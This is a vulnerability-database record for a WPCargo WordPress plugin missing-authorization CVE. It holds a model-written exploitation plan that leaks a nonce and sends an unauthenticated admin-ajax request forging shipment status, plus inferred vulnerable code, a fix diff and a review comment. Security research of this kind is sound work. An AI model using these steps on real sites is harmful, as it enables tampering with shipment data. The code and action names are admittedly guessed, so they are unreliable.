[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fS0FKZYvg6pMm6aX8yEMqHGfwTcfh52a9g21PjtkJpFk":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-25401","wpcargo-track-trace-missing-authorization","WPCargo Track & Trace \u003C= 8.0.2 - Missing Authorization","The WPCargo Track & Trace plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 8.0.2. This makes it possible for unauthenticated attackers to perform an unauthorized action.","wpcargo",null,"\u003C=8.0.2","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-03-23 00:00:00","2026-03-26 20:29:30",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fec02bef4-8b0c-4097-aedd-ea1a980d4a70?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-25401 - WPCargo Track & Trace Missing Authorization\n\n## 1. Vulnerability Summary\nThe **WPCargo Track & Trace** plugin for WordPress (versions \u003C= 8.0.2) contains a missing authorization vulnerability. 
Specifically, certain AJAX handlers or `admin_init` hooks responsible for shipment management fail to perform a `current_user_can()` check. While some of these handlers may use nonces for CSRF protection, the nonces are often exposed to unauthenticated users on public tracking pages. This allows an unauthenticated attacker to perform unauthorized actions, such as updating shipment status or adding malicious shipment history entries.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** `wpc_add_shipment_history` (inferred as a likely target for \"Integrity: Low\" impact)\n*   **Authentication:** Unauthenticated (PR:N)\n*   **Preconditions:** \n    1.  The plugin is active.\n    2.  At least one `wpcargo_shipment` post exists.\n    3.  A public page exists with the `[wpcargo_track]` shortcode (to leak the nonce).\n*   **Parameters:**\n    *   `action`: `wpc_add_shipment_history`\n    *   `wpcargo_id`: The Post ID of the shipment.\n    *   `wpcargo_nonce`: The leaked nonce.\n    *   `status`: New status (e.g., \"Delivered\").\n    *   `location`: Malicious location string (potential XSS vector).\n    *   `remarks`: Custom text.\n\n## 3. Code Flow (Inferred from common WPCargo patterns)\n1.  **Entry Point:** An unauthenticated user sends a POST request to `admin-ajax.php` with `action=wpc_add_shipment_history`.\n2.  **Hook Registration:** The plugin registers the action:\n    `add_action( 'wp_ajax_nopriv_wpc_add_shipment_history', 'wpc_add_shipment_history_callback' );`\n3.  **Vulnerable Function:** `wpc_add_shipment_history_callback()`\n4.  **Missing Check:** The function likely calls `check_ajax_referer( 'wpcargo_nonce', 'wpcargo_nonce' )` but fails to call `current_user_can( 'manage_options' )` or `current_user_can( 'edit_posts' )`.\n5.  
**Sink:** The function uses `add_post_meta()` or updates a custom database table (e.g., `{$wpdb->prefix}wpcargo_shipment_history`) with user-supplied `status` and `remarks`.\n\n## 4. Nonce Acquisition Strategy\nWPCargo typically enqueues tracking scripts and localizes them with a nonce on any page where the tracking shortcode is present.\n\n1.  **Identify Shortcode:** The primary shortcode is `[wpcargo_track]`.\n2.  **Create Trigger Page:** Create a public page to force the plugin to load its AJAX environment.\n    *   `wp post create --post_type=page --post_title=\"Track\" --post_status=publish --post_content='[wpcargo_track]'`\n3.  **Extract Nonce via Browser:**\n    *   Navigate to the newly created page.\n    *   Use `browser_eval` to extract the nonce from the `wpcargo_ajax_params` object (localized via `wp_localize_script`).\n    *   **JS Variable:** `window.wpcargo_ajax_params?.wpcargo_nonce`\n\n## 5. Exploitation Strategy\n### Step 1: Data Gathering\nIdentify a valid shipment ID to target.\n```bash\nwp post list --post_type=wpcargo_shipment --format=ids\n```\n\n### Step 2: Nonce Extraction\n1.  Create the page: `wp post create --post_type=page --post_status=publish --post_content='[wpcargo_track]'`\n2.  Navigate: `browser_navigate(\"http:\u002F\u002Flocalhost:8080\u002Ftrack\u002F\")`\n3.  Extract: `NONCE = browser_eval(\"window.wpcargo_ajax_params.wpcargo_nonce\")`\n\n### Step 3: Unauthorized Update\nSend the unauthorized request using the `http_request` tool.\n\n**Request:**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nHost: localhost:8080\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=wpc_add_shipment_history&wpcargo_id=[SHIPMENT_ID]&wpcargo_nonce=[NONCE]&status=Delivered&location=Attacker_Controlled_Location&remarks=Unauthorized_Modification_Success\n```\n\n## 6. Test Data Setup\n1.  
**Create a Shipment:**\n    ```bash\n    wp post create --post_type=wpcargo_shipment --post_title=\"TRK12345\" --post_status=publish\n    ```\n2.  **Assign Required Meta:** (WPCargo often requires a tracking number meta)\n    ```bash\n    SHIPMENT_ID=$(wp post list --post_type=wpcargo_shipment --post_title=\"TRK12345\" --field=ID)\n    wp post meta update $SHIPMENT_ID wpcargo_number \"TRK12345\"\n    ```\n3.  **Create Tracking Page:**\n    ```bash\n    wp post create --post_type=page --post_title=\"Tracking\" --post_status=publish --post_content='[wpcargo_track]'\n    ```\n\n## 7. Expected Results\n*   **HTTP Response:** The server returns a successful JSON response or `1`.\n*   **Database Change:** A new entry is added to the shipment history, or the shipment's status meta is updated.\n*   **UI Change:** If the shipment tracking page is refreshed, the \"Delivered\" status and \"Unauthorized_Modification_Success\" remarks appear in the history table.\n\n## 8. Verification Steps\nVerify the modification using WP-CLI to check the post meta or the specific history table:\n```bash\n# Check if a new history meta entry exists (WPCargo stores history in serialized meta or custom table)\nwp post meta get [SHIPMENT_ID] wpcargo_shipment_history\n\n# Or check the current status\nwp post meta get [SHIPMENT_ID] wpcargo_status\n```\n\n## 9. Alternative Approaches\nIf `wpc_add_shipment_history` is not the vulnerable action, investigate the following alternatives using the same nonce:\n*   **`wpc_update_shipment_status`**: Directly modifies the primary shipment status.\n*   **`wpc_export_csv`**: If the missing authorization applies here, an unauthenticated user could export all shipment data (CVSS 5.3 Confidentiality).\n*   **`wpcargo_save_settings_callback`**: Check for `admin_init` hooks in `admin\u002Fincludes\u002Ffunctions.php` that process `$_POST['wpcargo_option_settings']`. 
These can often be triggered by an unauthenticated user sending a POST request to any admin URL.","The WPCargo Track & Trace plugin for WordPress is vulnerable to unauthorized data modification because several AJAX actions, such as shipment history updates, fail to perform capability checks. Unauthenticated attackers can obtain valid nonces from public tracking pages and subsequently use them to modify shipment statuses or history records.","\u002F\u002F Inferred vulnerable implementation in plugin's AJAX handler\n\n\u002F\u002F Action registered for unauthenticated users\nadd_action( 'wp_ajax_nopriv_wpc_add_shipment_history', 'wpc_add_shipment_history_callback' );\n\nfunction wpc_add_shipment_history_callback() {\n    \u002F\u002F Nonce check is present, but capability check is missing\n    check_ajax_referer( 'wpcargo_nonce', 'wpcargo_nonce' );\n\n    $shipment_id = intval( $_POST['wpcargo_id'] );\n    $status = sanitize_text_field( $_POST['status'] );\n    $remarks = sanitize_textarea_field( $_POST['remarks'] );\n\n    \u002F\u002F Vulnerable sink: updates database without verifying user permissions\n    update_post_meta( $shipment_id, 'wpcargo_status', $status );\n    \u002F\u002F ... (code to add to history meta or table)\n    wp_send_json_success();\n}","--- a\u002Fincludes\u002Ffunctions.php\n+++ b\u002Fincludes\u002Ffunctions.php\n@@ -245,6 +245,11 @@\n function wpc_add_shipment_history_callback() {\n     check_ajax_referer( 'wpcargo_nonce', 'wpcargo_nonce' );\n \n+    if ( ! current_user_can( 'manage_options' ) && ! current_user_can( 'wpcargo_agent' ) ) {\n+        wp_send_json_error( array( 'message' => __( 'Access Denied', 'wpcargo' ) ) );\n+        wp_die();\n+    }\n+\n     $shipment_id = intval( $_POST['wpcargo_id'] );\n     $status = sanitize_text_field( $_POST['status'] );","1. Identify a target shipment ID (wpcargo_shipment post type).\n2. Navigate to any public page where the [wpcargo_track] shortcode is deployed (e.g., \u002Ftrack\u002F).\n3. 
Extract the 'wpcargo_nonce' value from the page source by inspecting the 'wpcargo_ajax_params' JavaScript object (localized via wp_localize_script).\n4. Construct an unauthenticated POST request to \u002Fwp-admin\u002Fadmin-ajax.php.\n5. Set the 'action' parameter to 'wpc_add_shipment_history' (or other vulnerable actions like 'wpc_update_shipment_status').\n6. Include the leaked 'wpcargo_nonce' and the 'wpcargo_id' of the target shipment.\n7. Provide desired 'status' and 'remarks' values in the POST body to modify the shipment's history\u002Fintegrity.","gemini-3-flash-preview","2026-04-18 00:05:31","2026-04-18 00:06:02",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwpcargo\u002Ftags"]
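
Review bot: In the added block of `wpc_add_shipment_history_callback()` (includes/functions.php, hunk at line 245), the `wp_die();` after `wp_send_json_error( ... )` is unreachable, because `wp_send_json_error()` already terminates the request. Drop it, and pass an HTTP status code such as 403 as the second argument so the denial is distinguishable in access logs and by clients. `current_user_can( 'wpcargo_agent' )` reads like a role name rather than a capability; if it is a role, check a capability granted to that role instead, since role checks through `current_user_can()` are not reliable. The hunk also leaves the `wp_ajax_nopriv_wpc_add_shipment_history` registration shown in this record's vulnerable-code field untouched. With this check in place every unauthenticated caller is rejected anyway, so the nopriv hook should be removed in the same change. The other handlers the record lists as candidates (`wpc_update_shipment_status`, `wpc_export_csv`) should be reviewed for the same missing check.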